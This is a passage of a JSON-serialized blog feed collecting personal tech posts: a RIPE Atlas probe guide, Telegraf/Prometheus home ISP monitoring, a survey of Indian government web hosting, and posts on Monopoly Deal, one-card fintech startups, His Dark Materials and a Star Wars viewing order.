\u002Fvar\u002Fatlas-probe\u002Fetc on the host path inside the container at \u002Fvar\u002Fatlas-probe\u002Fetc. This ensures that if you stop\u002Fremove the container, your public\u002Fprivate key pair isn’t lost and there’s no need to regenerate\u002Fapply for a Probe again. However in case you lose this, the Probe will attempt to generate a new pair and you might need to change the public key at that point of time. So be careful to take a backup of the generated key and store somewhere safe.\nAfter submitting the form, you will receive an email which will have information about your Probe ID.\n\n4. Wait patiently#\nAfter filling the form you need to wait roughly for 15 minutes for your probe to be added to the global network of Atlas Probes. You will receive an email saying your Probe is live now.\n\nCreating Measurements#\nIt’s pretty simple to create measurements, both via UI and a Python library developed by the RIPE community. However, for the ease and convenience I will demonstrate how to create a traceroute measurement from the UI itself:\nNote: You get around 15 Credits\u002Fminute for hosting a probe. In case you just deployed a probe you might not have enough credits to perform this measurement. You can come back later to do this when you have sufficient credits.\nVisit the dashboard and headover to Measurement tab. On clicking the Create a Measurement button you will be presented a form with various options. Let’s try a Traceroute to mrkaran.dev for this measurement:\n\nTo limit the number of probes, I am going to select all Probes in India, by clicking on +New Set -wizard option in the Probe Selection tab.\n\nAfter submitting the form, you will be presented with a Measurement ID which you can use to download the data at a later point as well.\n\nVisit the Measurement ID page and wait for a couple of minutes for all probes to perform the measurements:\n\nThat’s it! You can explore other types of Measurements and different options while performing them to customise your use case.\nSummary#\nAtlas Probes are pretty easy to host and they are crucial in giving valuable insights about how different clients connect to upstreams and spot issues in Networks. If you can host a probe, you should seriously consider doing that and help increase the number of probes in the network. As of today, the number of probes in India is just around 113 and that is seriously very less.\nIf you need any help hosting one, don’t hesitate to contact me on my Twitter.\nOh, and for the record, I am hosting 2 Probes currently. Probe 1000991 hosted on my local RPi connected to my home network (ASN24560) and Probe 1001117 hosted on a DigitalOcean droplet in Bengaluru (ASN14061).\n\nFin!",[],{"slug":2178,"title":2179,"link":2180,"pubDate":2181,"contentSnippet":2182,"tags":2183,"maintainerName":94,"maintainerUsername":95,"maintainerPhoto":96,"feedUrl":97},"isp-monitoring","Monitoring my home network","https:\u002F\u002Fmrkaran.dev\u002Fposts\u002Fisp-monitoring\u002F","2020-09-18T02:40:55.000Z","I like monitoring stuff. That’s what I do at work and when my home ISP started giving me random problems and I decided it would be nice to monitor my home network as well. There are a couple of ways to go around this, a very popular and OSS solution is SmokePing. SmokePing is written in Perl and is used to visualise network latencies. It’s quite a great solution but for my current stack which involves Prometheus and Grafana, it meant I had to deploy a standalone tool separate from my monitoring stack - something which I wanted to avoid.\n\nSo, I looked for other solutions and luckily happened to stumble upon oddtazz in one of the common Telegram groups where he shared his solution for the above: Telegraf ICMP plugin and Grafana. This is exactly what I’ve been looking for but for some reason, I had wrongly assumed Telegraf needs InfluxDB to store the data. Googling a bit more, I found Telegraf supports Prometheus format (amongst a huge list of others!) but this wasn’t so clear in their docs.\nI decided to run a Telegraf agent in my RPi connected to my home router over LAN and scrape metrics using Prometheus and visualise graphs in Grafana! For the non-patient readers, here’s what my dashboard looks like!:\n\n\nSetup#\nTo get started, we need to download Telegraf and configure the Ping plugin. Telegraf has the concept of Plugins for Input, Output, Aggregating and Processing. What this basically means is that you can configure multiple input plugins like DNS, ICMP, HTTP and export the data of these plugins in a format of your choice with Output plugins.\nThis makes Telegraf extermely extensible, you could write a plugin (in Go) of your choice if you fancy that as well!\nHere’s what my telegraf.conf looks like:\n# Input plugins\n\n# Ping plugin\n[[inputs.ping]]\nurls = [\"mrkaran.dev\", \"tailscale.mrkaran.dev\", \"floyd.mrkaran.dev\", \"1.1.1.1\", \"kite.zerodha.com\", \"google.com\", \"reddit.com\", \"twitter.com\", \"amazon.in\", \"zerodha.com\"]\ncount = 4\nping_interval = 1.0\ntimeout = 2.0\n\n# DNS plugin\n[[inputs.dns_query]]\n  servers = [\"100.101.134.59\"]\n  domains = [\"mrkaran.dev\", \"tailscale.mrkaran.dev\", \"floyd.mrkaran.dev\", \"1.1.1.1\", \"kite.zerodha.com\", \"google.com\", \"reddit.com\", \"twitter.com\", \"amazon.in\", \"zerodha.com\"]\n\n# Output format plugins\n[[outputs.prometheus_client]]\n  listen = \":9283\"\n  metric_version = 2\nFirstly, so nice to see an Ops tool not using YAML. Kudos to Telegraf for that. I’d love to see other tools follow suit.\nGetting back to the configuration part, input.plugin is a list of plugins that can be configured and I have configured the Ping and DNS plugin in my config. The output is in Prometheus format so it can be scraped and ingested by Prometheus’ time-series DB.\nRunning Telegraf#\nWith the above config in place, let’s try running the agent and see what metrics we get. I am using official Docker image to run the agent with the following config:\ndocker run --name telegraf-agent --restart always -d -p 9283:9283 -v $PWD\u002Ftelegraf.conf:\u002Fetc\u002Ftelegraf\u002Ftelegraf.conf:ro telegraf\nAfter running the above command, you should be able to see the metrics at localhost:9283\u002Fmetrics\n$ curl localhost:9283\u002Fmetrics | head\n  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current\n                                 Dload  Upload   Total   Spent    Left  Speed\n  0     0    0     0    0     0      0      0 --:--:-- --:--:-- --:--:--     0# HELP dns_query_query_time_ms Telegraf collected metric\n# TYPE dns_query_query_time_ms untyped\ndns_query_query_time_ms{dc=\"floyd\",domain=\"amazon.in\",host=\"work\",rack=\"work\",rcode=\"NOERROR\",record_type=\"NS\",result=\"success\",server=\"100.101.134.59\"} 124.096472\ndns_query_query_time_ms{dc=\"floyd\",domain=\"google.com\",host=\"work\",rack=\"work\",rcode=\"NOERROR\",record_type=\"NS\",result=\"success\",server=\"100.101.134.59\"} 136.793673\ndns_query_query_time_ms{dc=\"floyd\",domain=\"kite.zerodha.com\",host=\"work\",rack=\"work\",rcode=\"NOERROR\",record_type=\"NS\",result=\"success\",server=\"100.101.134.59\"} 122.780946\ndns_query_query_time_ms{dc=\"floyd\",domain=\"mrkaran.dev\",host=\"work\",rack=\"work\",rcode=\"NOERROR\",record_type=\"NS\",result=\"success\",server=\"100.101.134.59\"} 137.915851\ndns_query_query_time_ms{dc=\"floyd\",domain=\"twitter.com\",host=\"work\",rack=\"work\",rcode=\"NOERROR\",record_type=\"NS\",result=\"success\",server=\"100.101.134.59\"} 111.097483\nPerfect! Now, we’re all set to configure Prometheus to scrape the metrics from this target. In order to do that you need to add a new Job:\n- job_name: \"ispmonitor\"\n  scrape_interval: 60s\n  static_configs:\n    - targets: [\"100.94.241.54:9283\"] # RPi telegraf Agent\nIn the above config, I am plugging my Tailscale IP assigned to my RPi on the port where Telegraf agent is bound to. This is one of the many reasons why Tailscale is so bloody awesome! I can connect different components in my network to each other without setting up any particular firewall rules, exposing ports on a case by case basis.\nSidenote: If you haven’t read Tailscale’s amazing NAT Traversal blog post, do yourself a favour and check it out after you finish reading this one ofcourse!\nAnyway, coming back to our Prometheus setup, we can see the metrics being ingested:\n\nShow me the graphs#\nNow comes the exciting bit – making pretty graphs. First, let’s discuss what’s the most important data I can extract out of Ping and DNS plugins. These plugins export decent amount of data, but a good rule of thumb while making dashboards is to optimise signal v\u002Fs noise ratio. We’ll do that by filtering out only the metrics that we care for.\nLet’s checkout all the metrics exported by Ping plugin:\n$ curl localhost:9283\u002Fmetrics | grep ping | grep TYPE\n# TYPE ping_average_response_ms untyped\n# TYPE ping_maximum_response_ms untyped\n# TYPE ping_minimum_response_ms untyped\n# TYPE ping_packets_received untyped\n# TYPE ping_packets_transmitted untyped\n# TYPE ping_percent_packet_loss untyped\n# TYPE ping_result_code untyped\n# TYPE ping_standard_deviation_ms untyped\n# TYPE ping_ttl untyped\nPerfect! So, from the above list of metrics, the most important ones for us are:\nping_average_response_ms: Avg RTT for a packet\nping_maximum_response_ms: Max RTT for a packet\nping_percent_packet_loss: % of packets lost on the way\nWith just the above 3 metrics, we can answer questions like:\nIs my ISP suffering an outage?\nIf yes, ping_percent_packet_loss should be unusually higher than normal. This usually happens when the ISP has routing is borked and that causes the packet to be routed in a less optimized way and as a side effect packet loss becomes one of the key metrics to measure here.\nIs the upstream down?\nIf yes, ping_average_response_ms over a recent window should be higher than a window compared to a previous time range when things were fine and dandy. This can either mean 2 things: Either your ISP isn’t routing correctly to the said upstream or the CDN\u002FRegion where your upstream is faced an outage. This is quite a handy metric for me to monitor!\nHow many times have your friends complained “xyz.com isn’t working for me” and when you try to load, it’s fine from your end? There are a lot of actors at play but ping is usually the most simple and quickest way to detect whether an issue persists or not. Of course, this doesn’t work for hosts which block ICMP packets altogether. They are not rare either, like netflix.com and github.com both block ICMP probes for example. For my use case, this wasn’t a major issue as I was able to still probe a decent amount of upstreams all over the world.\nWith that out of the way, let’s break the dashboard into different components and see what goes behind them.\nPing Response Panel#\n\nTo plot this, simply choose a Stat visualisation with the query ping_average_response_ms{url=\"$url\"}. Repeat this panel for the variable $url and you should be able to generate a nice row view like this.\nAdditonally you can choose Thresholds and the Unit to be displayed in the panel with these options.\n\n\nPing Response Time Graph#\nThe next graph is interesting, it lets me visualise the avg, min, max ping response time as well as the % packet loss plotted on the Y2 (right Y) axis.\n\nAvailability Panel#\nAn interesting query to calculate uptime (just in the context whether the upstream is reachable) is:\n100 - avg_over_time(ping_percent_packet_loss[2m])\nSince I scrape metrics at an interval of 1m(in order to not ping too frequently and disrupt my actual browsing experience), in this query I am averaging the data points for the metric ping_percent_packet_loss in a [2m] window.\n\nDNS Response Time Graph#\nWe can similarly query the DNS response time by visualising the average response time for a DNS query. This might be useful only to people self-hosting their DNS servers.\n\nConclusion#\nSo with a pretty simple and minimal OSS solution, I was able to setup monitoring for my home network! Over the last few days whenever my ISP had slightest of trouble, I can correlate it with my metrics! I mean I still can’t do anything about it cause the other person on ISP’s customer support is “Did you try rebooting your router” – the quintessential solution to all tech problems. Wish we could reboot this entire damn 2020 as well, but one could hope!\nShoot me for any questions on my Twitter @mrkaran_ :)\nFin!",[],{"slug":2185,"title":2186,"link":2187,"pubDate":2188,"contentSnippet":2189,"tags":2190,"maintainerName":213,"maintainerUsername":214,"maintainerPhoto":215,"feedUrl":216},"goi-cyberspace","Analysing the Indian government cyberspace","https:\u002F\u002Fcaptnemo.in\u002Fblog\u002F2020\u002F09\u002F16\u002Fgoi-cyberspace\u002F","2020-09-16T00:00:00.000Z","I recently did some work on analysing the Indian government cyberspace, thought I should document them somewhere outside of my Twitter1.\nList of GoI websites\nI’d made a list of Indian government websites in Jan 2019:\nI ran @18F \u002Fpulse on Indian Government websites to see how many of them support HTTPS. A quick summary:\nTotal Websites: 14183\nTotal Live Websites: 11710 (82%)\nWebsites with Valid HTTPS: 4753 (40% of all live websites)\nRaw Dataset for now: docs.google.com\u002Fspreadsheets\n— Nemo (@captn3m0) January 15, 2019\n\n\nThe dataset was from 2 sources:\nGoI Directory\ncrt.sh (All certificates ending in .gov.in were used)\nI re-ran the scripts to get an updated list (12842 domains), then tabulated them against the public-suffix2 for each. There is a long-tail, and I’ve published results here. Here are the top public suffixes for Indian government sites:\nPublic Suffix\n      Domains\n    \nnic.in\n      2454\n    \ngov.in\n      7259\n    \nin\n      528\n    \nac.in\n      490\n    \ncom\n      568\n    \nco.in\n      171\n    \norg.in\n      168\n    \nedu.in\n      117\n    \norg\n      844\n    \nres.in\n      134\n    \nnet.in\n      12\n    \nnet\n      38\n    \nSanskari Proxy\nThis was a long standing idea on my ideas repo:\nA lot of Indian Government websites are inaccessible on the public internet, because\nthey geo-fence it to within Indian Boundaries. The idea\nis to make a Indian Proxy service that specifically works only for the Geo-fenced Indian government\nwebsites.\nFor eg, if uidai.gov.in is inaccessible, hitting uidai.gov.sanskariproxy.in will get you\nthe same result, proxied via our servers.\nSince I’d made an updated list of GoI websites, this seemed easy enough. I realized that setting up uidai.gov.sanskariproxy.in would likely count as impersonation under the Indian law,\nso I did the next best thing: run an actual proxy. Here’s the announcement tweet:\nAre you a security researcher outside India? Do you hate getting geoblocked to Indian government websites?\nWell, I made a proxy for security researchers outside India to access Indian government websites without resorting to shady VPNs.\ncaptn3m0\u002Fsanskari-proxy\n— Nemo (@captn3m0) September 5, 2020\n\n\nProject page is https:\u002F\u002Fgithub.com\u002Fcaptn3m0\u002Fsanskari-proxy, and if you’d like to get access - please reach out.\nCyberspace Ownership\nI’d planned to get a complete list of geoblocked websites next. While I’m progressing on this front, the results have been inconsistent\u002Finaccurate so far. As an intermediate step, I’d made a list of IPs against every domain3, which looked like this:\nDomain\n      IP Address\n    \naavin.tn.gov.in\n      164.100.134.148\n    \nabnhpm.gov.in\n      14.143.233.34\n    \nagnii.gov.in\n      13.232.216.65\n    \nap.gov.in\n      117.254.92.53\n    \naponline.gov.in\n      125.16.9.130\n    \nappolice.gov.in\n      118.185.110.147\n    \nattendance.gov.in\n      164.100.166.114\n    \ncgg.gov.in\n      112.133.222.115\n    \nWhile running numerous nmap scans (and failing), I start checking the ASN4 for some of these IPs to see who was hosting each website - especially the ones I was finding were blocked.\nI stumbled upon a bulk IP to ASN service by Cymru, ran all the IPs against it and published the results. Here’s the important graph:\n\nAs you can expect, NIC5 has the highest share, with NKN6, BSNL, and CtrlS following at roughly 5% each. There are a few other chart on the twitter thread, and the raw data is available here with interactive versions of each visualization.\nWhat next?\nI’m working on running and comparing connectivity scans to these IPs to get a better understanding of the geoblocking situation. There’s also some issues with the domain list, as it seems to be missing lots of domains - so more corrections are needed.\nTwitter decided to suspend 12 different accounts I had access to recently - I’m starting to get wary of using Twitter for archival now. ↩\nA “public suffix” is one under which Internet users can (or historically could) directly register names. For eg - nic.in or github.io. Mozilla manages the list at https:\u002F\u002Fpublicsuffix.org\u002F. ↩\nThere are issues with this approach, since domains do resolve to multiple IPs. But this is okay for the rudimentary analysis I’ve been doing so far. ↩\nAutonomous Systems (AS) is how the internet is sliced up and managed by different entities. Each AS (usually an ISP) is responsible for routing within its network, while announcing network routes on how it can be reached. ↩\nThe primary government office (under MeitY) that provides infrastructure and support for government IT services. ↩\nNational Knowledge Network is a multi-gigabit research and education network that provides a high speed network backbone for educational institutions in India. ↩",[],{"slug":2192,"title":2193,"link":2194,"pubDate":2195,"contentSnippet":2196,"tags":2197,"maintainerName":15,"maintainerUsername":16,"maintainerPhoto":17,"feedUrl":18},"setting-up-whatsapp-telegram-bridge-using-matterbridge-2020","Setting up WhatsApp Telegram Bridge Using Matterbridge 2020","https:\u002F\u002Fibcomputing.com\u002Fsetting-up-whatsapp-telegram-bridge-using-matterbridge-2020\u002F","Fri, 11 Sep 2020 14:12:49 +0000","Two years ago I wrote an article about bridging WhatsApp and Telegram groups together. But that solution isn’t working anymore. So I figured out another … \nThe post Setting up WhatsApp Telegram Bridge Using Matterbridge 2020 appeared first on IB Computing.",[2198,2199,2200],"Android","Telegram","Tutorials",{"slug":2202,"title":2203,"link":2204,"pubDate":2205,"contentSnippet":2206,"tags":2207,"maintainerName":213,"maintainerUsername":214,"maintainerPhoto":215,"feedUrl":216},"monopoly-deal","The game breaking Deal Breaker card","https:\u002F\u002Fcaptnemo.in\u002Fmonopoly-deal\u002F","2020-06-24T00:00:00.000Z","I have a presentation I sometimes give about Monopoly being a terrible game1.\nI usually end it by pointing the audience to Monopoly Deal, which I introduce it as\n“the only Monopoly edition you can enjoy”.\nThe advantages are obvious:\nMuch shorter game length.\nNo dice rolls.\nEven if you lose badly on luck, you’ve only lost 15 minutes. While it is better than Monopoly, that isn’t to say it is a well designed game (6.3 on BoardGameGeek).\nThe one major dent in the otherwise decent game is the “Deal Breaker” card, which breaks the game. I’ve house-ruled the game\nsince forever to keep the card out of the game, since it breaks the most important rule of game design:\nGames should be fun2\nDeal Breaker stops people from doing that. How? Read on.\n\nAside: Monopoly Deal (2-5 players) Basic Rules (Click to expand)\nThe objective of the game is to get 3 sets of properties in distinct colors. The first player to 3 sets wins the game. There are some action cards, which let you get money\u002Fproperties from other players. Important action cards, relevant for this post:\n\nThe Deal Breaker card lets you \"steal\" a complete set from another player.\nThe Just Say No card lets you say no to any action that any player takes against you. It is the only way to counter a Deal Breaker card.\nHere's a short 3 minute video if you'd like to learn the complete rules.\n\n\n\n\nA lot of metagaming discussion with friends resulted in the following observations:\nThe Deal Breaker is a very powerful card (It takes you 1\u002F3rd of the way to a victory).\nYou can assume the single Deal Breaker card to be worth a complete set.\nThe best use of such a card is to win the game. Using it earlier means giving other players a chance to drag you down from 2->1 set. But if you use it to win the game, the game ends immediately.\nHence, Deal Breaker will always end up being the last card of the game.\nIf you are playing a game with the Deal Breaker card, you’d want to save it till the very end, and win the game with it. The only possible case for not winning is the other player having a “Just Say No” card, and playing it on the Deal Breaker to negate your move.\nErgo, the metagame converges to the following:\nAny game with Deal Breaker will end up having the Deal Breaker as the last turn.\nThe only way to prevent someone else from winning with the Deal Breaker is to play a Just Say No on the Deal Breaker.\nIf you have a Just Say No card, you must save it till the end of the game for the Deal Breaker.\nThere are 2 Deal Breakers, and 3 Just Say Nos in the game. However, considering a single Deal Breaker is enough to win the game, and the chances of you getting a second of either card are fairly small - both the Deal Breaker and Just Say No cards will end up getting hoarded for the endgame.\nWhat this results in is something that breaks the fundamental rule of game design:\nPlayers are disincentivized from playing the Just Say No card.\nAs any Exploding Kittens player can confirm, playing a Just Say No card is one of the coolest moves in the game. It lets you stick it to the player who dares ask you for 8M3 rent. It lets you pretend you’re counting your money, and then pull out a trump card and feel awesome! By disincentivizing players from playing the coolest card in the game, the Deal Breaker card makes things less fun. And that breaks our “rule of fun”.\nIn fact, the mere existence of a Deal Breaker card changes the equation. Note that there may be cases where you lose with a Just Say No card because you were hoarding it for the eventual Deal Breaker (which might never come). Someone asks you for 4M rent, and you have to pay up despite having a Just Say No card, because you must save the damn card for when someone steals your set. There are a few rare exceptions, but the Deal Breaker creates too many plays where not playing the Just Say No is indeed the correct move.\nSo here is the more interesting corollary observation:\nThe mere existence of the Deal Breaker card breaks the game by making the Just Say No card unplayable and worthless.4\nHence, if you’re playing Monopoly Deal, please house-rule the Deal Breaker card and make it easier for everyone. Two easy ways are:\nRemove the card from the game entirely.\nReduce the power of the game to be same as a Forced Deal, except let it break a set.\nI have the slides here, but they don’t stand well on their own. ↩\nAny game that eliminates players from the game breaks this rule. Popular examples are Monopoly and Mafia\u002FWerewolf. Also see this amazing post on the biggest mistake that Guillotine makes (The “Callous Guard” card). ↩\nTurns out, that there is no symbol in the unicode for Monopoly Money ↩\nWe decided Deal Breaker might make sense in 6+ player games with many more cards, where it might help even the playing grounds a bit for a losing player (much more likely) instead of helping the almost-winning-player score a victory. ↩",[],{"slug":2209,"title":2210,"link":2211,"pubDate":2212,"contentSnippet":2213,"tags":2214,"maintainerName":213,"maintainerUsername":214,"maintainerPhoto":215,"feedUrl":216},"one-card-to-rule-them-all","A survey of OneCardToRuleThemAll companies","https:\u002F\u002Fcaptnemo.in\u002Fone-card-to-rule-them-all\u002F","2020-06-22T00:00:00.000Z","A lot of companies have come up with the idea for reducing all your cards into a single piece of plastic. Here’s a summary of all the ones I could find, and their fate.\nBeware: this field is very much a startup graveyard. The only remaining survivor seems to be Curve1 but it’s also the first one that’s attempting this outside of US.\nThere seem to be a lot of challenges (regulatory, financial, and technical) before such a thing becomes reality. And there’s Apple\u002FSamsung Pay as well. Here’s a summary of all the companies I could find in this space.\nIf I’ve missed any, please let me know, and I’ll add them here.\n\nCurve (2015-)\nCurve allows you to spend from any of your accounts using just one card, clearing the clutter from your wallet and simplifying your finances.\nCurve has raised a total of $74M at a valuation north of $250M, out of which £6M were from a crowdfunding campaign in 2019.\nTheir waitlist is at 800,000+ users.\nCurve faced flak for failing to disclose its usage numbers (\u003C100,000 monthly active users out of total 500,000) to crowdfund investors.\nOnly works with Visa\u002FMasterCard. Used to work with Amex, but Curve has a history of working and being blocked by Amex repeatedly.\nSee this page for some details on how it works.\nCoin (YC W13) (2012-2017)\nCoin raised a total of $15.6M.\nShipped in 2015 April.\nAcquired by Fitbit in May 2016.\nShutdown by Fitbit in Feb 2017.\nRelated: Google acquired FitBit in 2019 Nov.\nPlastc (2014-2017)\nSingle dynamic card with e-Ink touchscreen. See obligatory launch video with fancy AR.\nCrowdfunded $9M on pre-orders in October 2014.\nDelayed launch to April 2016, and then again to September 2016.\nShut down and declared bankruptcy in April 2017.\nComplete story via digg.com.\nStratos (2015-2015)\nWas supposed to cost $95\u002Fyear.\nAnnounced May 2015.\nRaised $6.63 million over three rounds of financing.\nRan out of money by December 2015.\nSold to Ciright One to avoid collapse.\nSeems to be dead now.\nSwyp (2014-2017)\nHad a pre-order campaign in 2014.\nRaised $5M from Khosla Ventures in 2017.\nTried to pivot in 2017, failed.\nOffered customers a debit card with an app called Hoot in 2017 as an alternative to refunds. I don’t think the Hoot card ever materialized.\nTilt (Swyp’s payment processor) also ceased operations in 2017, due to unrelated reasons.\nSwyp finally shut down in December 2017.\nFinal (YC W15) (2014-2017)\nFinal was with a credit card with a different number for every website. As a independent card, Final doesn’t exactly fit in this list, but it’s a very relevant and loved product.\nAnnounced itself with a snazzy video in mid 2014\nRaised $4M and launched in August 2016, but remained invite-only till the very end.\nFinal’s blog has some interesting content: A Request for Credit Cards program to build card-issuance backed businesses and the Payment card landscape for 2017.\nShut down in december 2017 and acquired by Goldman Sachs in an acqui-hire.\nIndian Landscape\nIndia hasn’t seen a true single-card app yet, but there have been lots of related attempts:\nInfino promises a single-card, but it hasn’t launched yet. It had a public roadmap, but never launched and ultimately pivoted to a Coupon Aggregator called Meet Donut, which shut down.\nIndusInd bank has tried a dual-chip debit+credit card. Union Bank has a similar card.\nIndusInd has also tried an interactive credit card with 3 buttons.\nFamPay, Fold, Niyo, OneCard, Donut🪦, vCard🪦, Slice 2 and lots of other startups are doing co-branded issuance, but that’s not the same thing.\nWith the emergence of UPI, and low penetration rate of credit cards, I don’t see a market in India - but I’d love to be proven wrong.\nDid I miss anything? Reach out and let me know.\nThanks to Harman for reviewing drafts of this, and PRL for getting me interested enough to document this.\nCurve used to live on imaginecurve.com, then switched to curve.app and now to curve.com, which must have cost them millions. ↩\nUnlike others on the list, vCard is entirely a virtual card, and supports UPI transfers from your credit limit. ↩",[],{"slug":2216,"title":2217,"link":2218,"pubDate":2219,"contentSnippet":2220,"tags":2221,"maintainerName":213,"maintainerUsername":214,"maintainerPhoto":215,"feedUrl":216},"his-dark-materials","His Dark Materials Season 1 Readthrough","https:\u002F\u002Fcaptnemo.in\u002Fblog\u002F2020\u002F06\u002F07\u002Fhis-dark-materials\u002F","2020-06-07T00:00:00.000Z","A long time ago, I tried to do a readthrough for Game of Thrones (Book 1) alongside the first season. I managed to reach Episode 5, before I sped through the rest of the book, but I tried.\nTrying something similar for His Dark Materials, which is a great series if you’re looking to watch something new. Instead of noting down Chapter\u002FBook equivalence (like I tried last time), going to write down my thoughts here as I’m reading along. Spoiler Warning for the entire first season obviously.\nOverall\nThe show is very tightly knit with the book with a few over-arching changes from the story-telling perspective:\nYou get to see other points-of-view, other than just Lyra. Helps establish what else is happening, especially in the other worlds.\nA lot of infodumps are prevented, or better, broken down into multiple sessions.\nThe major change from the first book is ofcourse showing Will’s PoV and our earth.\nChapter 1\nThe opening scene with the great flood sets some context, but isn’t in the books.\nThe Master\u002FButler chat on the wine poisoining happens much later in the books.\nThere is a lot of foreshadowing around Lyra’s parentage that happens in the first 2 chapters that is entirely missed in the show.\nChapter 2\nThe entire Grumman’s skull and hunt sub-plot hasn’t shown up in the book so far (presumably because we only see Lyra’s PoV).\nThe party scene is very-well handled (with all the subtle changes for the better. Superb acting as well :)\nThe hiding-lyra-in-the-boat scene is merely given a passing mention in the book, but so well done in the show.\nChapter 3\nSplitting Lyra’s parentage reveal (Coulter reveals her father) is a smart move in the show.\nThe show changes Lyra’s kidnappers from Turkish slavers to Gobblers.\nThe Alethiometer reveal happens with both Father Coram and John Fa in the book. The section also has a huge infodump, especially since it involves the parentage reveal. The show breaks it into 3: alethiometer reveal with Father Coram, a previous interrogation of Lyra with John Fa, and Lyra’s parentage reveal (mother) with Ma Costa.\nChapter 4\nThe one notable “not-in-the-book” scene is the Coulter’s meeting with Iofur.\nChapter 5\nInteresting to note that the characters of Billy and Roger are fused in both the film and the TV adaptations.\nChapter 6\nLyra starts a fire in the books, but the show makes it more dramatic by destroying the machine.\nThe balloon ride covers a lot more in the books.\nLearnings\nOverall, the show has been nicely adapted so far, and I think there’s a few reasons:\nThe show barely messes with Lyra’s timeline. Important to ensure this to avoid creating cascading issues down the path.\nMajority of the changes are either made on kill-able subplots, or side-plots that show us what’s going on elsewhere.\nAnd finally, the show spends time on where the medium works best. The scaring scene in Chapter 2, for eg.\nI’m still sad that the ghosts in the crypt don’t get to be seen, though.",[],{"slug":2223,"title":2224,"link":2225,"pubDate":2226,"contentSnippet":2227,"tags":2228,"maintainerName":213,"maintainerUsername":214,"maintainerPhoto":215,"feedUrl":216},"starwars-beskar-viewing-order","Star Wars Beskar Viewing Order","https:\u002F\u002Fcaptnemo.in\u002Fstarwars-beskar-viewing-order\u002F","2020-05-04T00:00:00.000Z","I tweeted out my recommended viewing order for Star Wars recently1:\nHappy #StarWarsDay folks. If you've somehow managed to avoid watching Star Wars, here's my recommended viewing order (No Spoilers, 1\u002Fn) pic.twitter.com\u002FK70O4ydCB7\n— Nemo (@captn3m0) May 4, 2020\n\n\nThought I should expand a bit on the what and why. Spoilers towards the end (marked). I also went ahead and named it:\nThe Beskar Order\nRogue One: A Star Wars Story\nStar Wars: Episode IV - A New Hope.\nStar Wars: Episode V - The Empire Returns\nStar Wars: Episode VI - Return of the Jedi\nThe Mandalorian (S01E01-04)\nStar Wars: Episode VII - The Force Awakens\nThe Mandalorian (S01E05-08)\nIf you’ve enjoyed the above, you should pick between the following 2 next:\nIf you liked the core Skywalker Saga (Episodes IV-VI), and want to explore Anakin’s origins - Go and watch the prequel trilogy (Episode I, II, III).\nIf you liked Force Awakens, you should go finish the sequels (Star Wars Episode VIII, IX)\nIn either case, I want to leave this as a choice to the viewer. The prequel trilogy has a lot of flaws. The Machete order famously drops an entire film, and it wasn’t even trying to make room. Go to the prequels if you want to explore the lore. On the flip side, if you liked how Disney handled Episode VII, and want to see closing arcs for the major characters, try the sequels. I wouldn’t recommend interleaving them - it doesn’t get you much and makes it confusing.\nIf you’re still here after finishing both of these (that makes for a total of 10 films and 1 season of telly) - you ought to explore for yourselves. Here’s suggestions depending on what you’d like:\nClone Wars (TV Series, 7 seasons)\n  for exploring the franchise at a less grand scale. There’s an Essential viewing order, which covers all the major arcs and best episodes.\n  The Mandalorian (Season 2, Oct 2020)\n  To find out what happens to Baby Yoda\n  Star Wars: Rebels (TV Series, 4 Seasons)\n  If you want to explore new characters and like something Firefly-esque.\n\n\nThere are boardgames, RPGs, and some really great books in the franchise as well. Pick what you’d like to explore.\nInspiration\nThe classic Machete Order which does a lot of great things, by skipping a film, preserving tension and plot-twists. Also of note are the various fan-edits, of which I’ve only ever tried The Phantom Edit.\nRationale\nI tried to optimize for a few things:\nFun while watching the series. So good stuff comes first, paired films etc, and intentionally including The Mandalorian.\nEasy stoppage. In case you don’t like the series, you should be able to stop midway, and still have seen the important\u002Fbest bits.\nSticking to chronological order in the stuff I picked (as much as possible). Sticking to chronology makes it easier to consume.\nTotal time. I don’t want to prescribe a “complete-viewing-order”, but rather a “starting point”.\n(1) is easy to optimize for. (2\u002F3) results in things getting thrown around a bit, and (4) means I leave out stuff that you should pick for later.\nWhy not include __?\nThis is not meant to be an exhaustive order, and I was optimizing for total time. Important mentions:\nSolo\n  Not really essential viewing.\n  Star Wars: The Clone Wars\n  The film is terrible (5.9 on IMDB), because it wasn’t meant to be one.\n  Star Wars: The Clone Wars TV Series\n  I wanted to stick to the main saga, and its just too damn long to recommend casually in any viewing order.\n  Star Wars: Holiday Special\n  I still can’t bring myself to finish it. It isn’t even canon any more (Life Day is)\n  Legends\u002FResistance\n  Again, not essential viewing.\n\n\nFAQ\nWho is this for?\n  Recommended for first-time viewers. If you are doing a rewatch, I recommend following The Beskar Machete order.\n  Have you watched everything Star Wars?\n  I can’t even claim to have watched all 12 films, because I couldn’t finish The Clone Wars (movie). I’m still watching Clone Wars (TV series).\n  Why Beskar?\n  I wanted something that would work well with Machete, for the hybrid order. It also makes a point about The Mandalorian 2 belonging in the order.\n  I don’t have this much time!\n  I’ve tried to optimize for viewing time already. If you wanna trim further - you’ll be left with just the original trilogy (Episode IV, V, VI). Alternatively, just watch The Mandalorian - it stands very well by itself.\n  Did you backdate this post while publishing?\n  Yes. I wrote it just a few days after May 4th, and thought it would be nice.\n\n\n\n\nMore Rationale (SPOILERS AHEAD)\nSPOILERS FROM HERE ONWARDS FOR ALL 12 FILMS. READ AT YOUR OWN PERIL\nWhy start with Rogue One?\n  \n    \nRogue One is a great film, and I love how well it segues into A New Hope. Watching them both back-to-back makes for a great experience. You have this ragged group that has laid down their lives for just a memory chip - and you get to see that bloom into an entire saga. Finishing the original trilogy from there makes sense. The Machete order strongly recommends against starting with Rogue One, but I’ve tried it and it works.\nWhy not stick with the Machete order as well?\n  The Machete order goes (IV, V, II, III, VI), deciding to leave out Episode I, and wedging Episodes II, III before you see Return of the Jedi. I was optimizing for time here a bit, and I had to leave the prequels as “for-later” in order to make space for the remaining. If you’re doing a rewatch, and aren’t short on time - you can totally follow it. This is what it morphs into:3\n\n    \n      Beskar Machete Order\n      \nRogue One: A Star Wars Story\nStar Wars: Episode IV - A New Hope\nStar Wars: Episode V - The Empire Returns\nStar Wars: Episiode II - Attack of the Clones\nStar Wars: Episode III - Revenge of the Sith\nStar Wars: Episode VI - Return of the Jedi\nThe Mandalorian (S01E01-04)\nStar Wars: Episode VII - The Force Awakens\nThe Mandalorian (S01E05-08)\nStar Wars: Episode VIII - The Last Jedi\nStar Wars: Episode IX - The Rise of Skywalker\nWhy add the Mandalorian at all?\n  Because frankly - it is both a piece of art, and the best entry into the Star Wars canon in a long time. It also fits into chronological order just after Return of the Jedi - you see how the New Republic has been incompetent, and the ashes of the Empire. You get to 